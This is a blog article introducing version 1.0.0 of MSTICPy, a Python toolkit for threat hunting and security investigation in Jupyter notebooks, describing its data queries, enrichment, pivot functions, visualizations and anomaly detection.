MSTICPy v1.0.0 and Jupyter Notebooks for CyberSec
With the recent release of v 1.0.0 of MSTICPy we thought it was a good time to do an overview article. This is based on an article in the Azure Sentinel Technical Community blog but since that one focuses on MSTICPy’s use in Azure Sentinel and MSTICPy is ostensibly SIEM-agnostic we thought it would be good to do another version of it here.
What is MSTICPy?
MSTICPy is a package of Python tools for security analysts to assist them in investigations and threat hunting. It is primarily designed for use in Jupyter notebooks. If you haven’t used notebooks for security analysis before we’ve put together a (completely unbiased) guide on why you should!
The goals of MSTICPy are to:
- Simplify the process of creating and using notebooks for security analysis by providing building-blocks of key functionality.
- Improve the usability of notebooks by reducing the amount of code needed in notebooks.
- Make the functionality open and available to all, to both use and contribute to.
1000 feet view
MSTICPy is organized into several functional areas:
- Data Acquisition — is all about getting security data into the notebook. It includes data providers and pre-built queries that allow easy access to several security data stores including Azure Sentinel, Microsoft Defender, Splunk and Microsoft Graph. There are also modules that deal with saving and retrieving files from Azure blob storage and uploading data to Azure Sentinel and Splunk.
- Data Enrichment — focuses on components such as threat intelligence and geo-location lookups that provide additional context to events found in the data. It also includes Azure APIs to retrieve details about Azure resources such as virtual machines and subscriptions.
- Data Analysis — packages here focus on more advanced data processing: clustering, time series analysis, anomaly identification, base64 decoding and Indicator of Compromise (IoC) pattern extraction. Another component that we include here but really spans all of the first three categories is pivot functions — these give access to many MSTICPy functions via entities (for example, all IP address related functions are accessible as methods of the IpAddress entity class.)
- Visualization — this includes components to visualize data or results of analyses such as: event timelines, process trees, mapping, morph charts, and time series visualization. Also included under this heading are a large number of notebook widgets that help speed up or simplify tasks such as setting query date ranges and picking items from a list. Also included here are a number of browsers for complex data (like the threat intel and alert browsers) or to help you navigate internal functionality (like the query and pivot function browsers).
We’ll cover a lot the things we just mentioned later in the article.
This article has a companion notebook. This is the source of the examples in the article and you can download and run the notebook for yourself. The notebook has some additional sections that are not covered in the article.
Assuming that you have a blank notebook running what do you do next?
Most of our notebooks include a more-or-less identical setup sections at the beginning. These do three things:
- Checks the Python and MSTICPy versions and updates the latter if needed.
- Imports MSTICPy components.
- Loads and authenticates a query provider to be able to start querying data.
The following cell includes the first two of these:
If you see warnings in the output from the cell about configuration sections missing you should check out Getting Started documentation. Even if you are not running in Azure Sentinel, you may also find these two notebooks useful:
The utils.check_versions() function is really aimed at checking and tweaking the notebooks environment in Azure ML notebooks. If you’re running the notebook elsewhere then you can safely ignore this.
The init_notebook function automates a lot of MSTICPy import statements and checks to see that your configuration looks healthy.
The third part of the initialization loads the data provider (which is the interface to query data) and authenticates to your data source. In this example, we’re using the Azure Sentinel data provider.
Assuming you have your configuration set up correctly, this will usually take you through the authentication sequence, including any two-factor authentication required.
Wait! I don’t have a SIEM to query data from
As long as you can get your data into a pandas DataFrame, you can use most of MSTICPy and the examples in the notebook. We have a few “pickled” (use pandas pd.read_pickle()) or CSV sample data in these two locations:
You can also obtain a lot of very interesting attack data samples from the Open Threat Research Forge’s brilliant Mordor project. (MSTICPy has a data provider to help you search for a download samples from Mordor).
Once this data provider is loaded and authenticated, we’re at the stage where we can start doing interesting things!
MSTICPy has many pre-defined queries for Azure Sentinel (as well as for other providers). You can choose to run one of these predefined queries or write your own. This list of queries is usually up-to-date but the code itself is the real authority (since we add new queries frequently). The easiest way to see the available queries is with the query browser. This shows the queries grouped by category and lets you view usage/parameter information for each query.
There is also a command-line equivalent function to the browser — qry_prov.list_queries().
Nearly all queries need time range parameters. You can specify these as parameters to the query function but who wants to type long date-time strings? It usually easier to use the QueryTime widget to set your desired time range and just pass it to the query. In the example below we can see how to load the QueryTime widget. You pass the widget itself to the query function, where the start and end values will be inserted into the query before being run.
One thing you can see from this screen shot is that the data is returned as a pandas DataFrame. pandas is a package that is extremely popular in the data science community. MSTICPy uses it extensively as a universal data interchange format between different components. We’ll see more examples of DataFrames as we move through the article.
Although there are a lot of built-in queries, there will always be cases where you need something different. There are a couple of approaches:
- Most queries will take an optional parameter add_query_items which allows you to tack on (some might say “inject”!) arbitrary KQL (for Azure Sentinel queries) to the query.
- You can write a query from scratch as a string and just execute it.
These options are shown below in these two examples.
Now that we can get data, let’s do something more interesting with it.
One of the most basic but also most useful visualizations is to project events onto a timeline. You can do this using MSTICPy’s separate Timeline function or, more conveniently call it directly from a DataFrame using the mp_timeline pandas extension.
MSTICPy makes extensive use of the interactive graphics of Bokeh. These charts can be panned and zoomed. Each event also has a hover-over tool-tip containing summary information about the event (the summary is derived from the source_columns parameter list).
A process tree is another common visualization used when investigating endpoint (host) data.
Like the timeline, the process tree supports panning, zooming, hover details and has an optional data table viewer (you need to specify show_table=True when calling the function).
As mentioned at the start, MSTICPy has a number of special-purpose viewers for things like alerts, where it is often difficult to see the required data in a when it’s in tabular format.
This example combines both the timeline viewer and the SelectAlert browser.
Data Enrichment with Threat Intelligence, WhoIs and GeoIP
MSTICPy contains many enrichment components for geo-location, ASN/whois, threat intelligence, Azure resource data and others.
This example shows calling a method of the IpAddress entity class to get WhoIs information for an IP address.
Although the whois feature is available as a standalone function, we’ve used a pivot function of the IpAddress class here. To do this we needed to load the Pivot class.
Side note — Pivot functions
If what you want to do is entity-related, there is a good chance that the MSTICPy function will appear as an entity pivot function. Queries, enrichment functions and analysis functions that relate to a particular entity type are all exposed as pivot functions of that entity.
Wait — what is an Entity?
An entity is essentially a “noun” in the CyberSec world — for example: an IP Address, host, URL, account, etc. They are typically things that do stuff or have stuff done to them. Entities will always have one or more properties that identify the entity and might also have additional context properties. For example, an IpAddress entity has its primary Address property and it might also have contextual properties like geo-location or ASN data.
Pivot functions are “verbs” to the entities “nouns”. They perform investigative actions (like data queries) on the entity and return a result. The Host entity class, for example, has data queries that retrieve process or logon events logged for that host. The IpAddress entity has functions to lookup its geo-location or query information about the address from threat intelligence providers.
Pivot functions are not statically coded into the entity classes. Instead, the pivot subsystem harvests pivot functions from available queries and components and dynamically adds them to the entities. This gives us a lot of flexibility to add new functions as the features of MSTICPy evolve. It also allows you to use functions from third party libraries or write your own functions and expose them as pivot functions.
How do you find what pivot functions (and even what entities) are available? The easiest way to view the entities, their pivot functions and the help associated with each function is to use the Pivot browser (similar to the query browser shown earlier).
Being grouped with their respective entities makes the pivot functions easy find (compared with hunting through documents to find the right module or function to import). Pivot functions are grouped into related sub-containers of the entity — so, all AzureSentinel queries have the form entity.AzureSentinel.query_function()
Another advantage of pivot functions (over standalone functions) is that they have a homogeneous interface. They will all accept inputs as single values, lists of values or values stored in DataFrames. They also always return their results as DataFrames.
Back to Enrichment
A nice side benefit of pivot functions using DataFrames as both input and output is that we can chain several together in a pandas pipeline. Here we’re taking IP addresses from an alert and successively getting WhoIs data, geo-location data (after this we insert an mp_pivot.display function to peek at the intermediate data in the pipeline). Finally, we’re querying multiple Threat Intelligence providers to see if they have any data about the IP address. At each stage we’re asking for the new data obtained by each stage to be joined to the previous stage (via the join parameter) — although joining is optional.
We then display the results output by this pipeline from (the last data tagged on is from the threat intel providers) in another special-purpose viewer — the TI browser. We’ll see this again a little later.
Here is an example of a more traditional “pipeline” — i.e. just good old Python function calls — rather than using pandas. It’s a bit clunkier but you can see more clearly what is going on in each step. Even if your plan is to produce a pipeline like the previous example, it’s a good idea to start with individual function calls and temporary variables until you get bugs ironed out.
The sequence below stitches together the base64 decoder, IoC pattern extractor and threat intel lookup that we saw previously. It’s taking an obfuscated PowerShell command line and extracting and examining the contents found in the decoded string. Finally, it displays the TI results in the TI browser.
Using advanced analysis (aka simple machine learning)
MSTICPy has several more-advanced analysis components that help with identifying anomalous patterns in large data sets.
First we’ll show the time series decomposition and visualization component. This works by determining regular patterns of bulk events (think of outbound network byte counts or logon failures) and then identifies outliers to this pattern with a simple statistical calculation.
You can see the daily cadence network traffic and the presence of two outlying events on 7–11 (the date, not the store).
Where the data is more complex than bulk counts, we can use another anomaly identification technique using Markov Chains. Markov chains is a technique used to predict the future probability of something occurring given the probability of things that happened previously.
Here we are using it to analyze Office 365 data. We will build a model to determine the probability of specific sequences of actions and then identify rare sequences that deviate from this base probability. Office activity data is first grouped into sessions based on user name and source IP address. The probability of a given sequence of actions within a session is measured during the creation of the model. For example, it would be very common to see actions like opening emails, reading a few files, etc. An atypical session — that reads hundreds of files or performs unusual actions like setting a mail forwarding rule or delegating control of a mailbox — would be much less probable and so would detectable.
(the full code for this is given in the notebook)
There is clearly one session that stands out from the crowd in terms of the unusual actions seen in that session. We can use the rarity score (the inverse of the probability) to quickly filter out the other sessions and see what was happening. In this case, the event revealed a series of unexpected privilege assignment actions.
Documentation and Resources
We’ve invested a lot of time in documentation (since nothing is more frustrating than an interesting package that you cannot find how to use!). Most of this is the form of user guides for the different components — see msticpy ReadTheDocs — and we also have a set of example notebooks for many components. You can also find a set of more applied notebooks in the Azure-Sentinel-Notebooks repo (although some of these could do with an update or two — which we’re working on). We do also try to document our code well so that even the API documents are often informative enough to work things out (if you find examples where this isn’t the case, please let us know).
Thanks for sticking with me in through this marathon article. I hope it has given you a flavor of the power of Jupyter notebooks in CyberSec hunting and investigation tasks and a reasonable overview of many of the capabilities in MSTICPy.
Take-aways and actions.
- The very obvious first action is go and start playing with notebooks for your CyberSec investigations.
- Second would be install MSTICPy and kick the tires. We are always looking for feedback on what does and doesn’t work and are always open to requests or suggestions for new features.
- Read the docs.
- If you’re feeling adventurous, consider contributing to MSTICPy. These could be ideas that you have that you think would be helpful to the CyberSec community. If you’re a bit stuck for ideas but love security and Python coding, we have a few ideas of our own and way too few people to implement them.
- File an issue, feature request, create a PR or just poke around the code on our GitHub repo.
- Read a summary of the latest release.
- Follow me (@ianhellen), Pete (@MSSPete) and Ashwin (@ashwinpatil) on Twitter.
- You can also reach us at email@example.com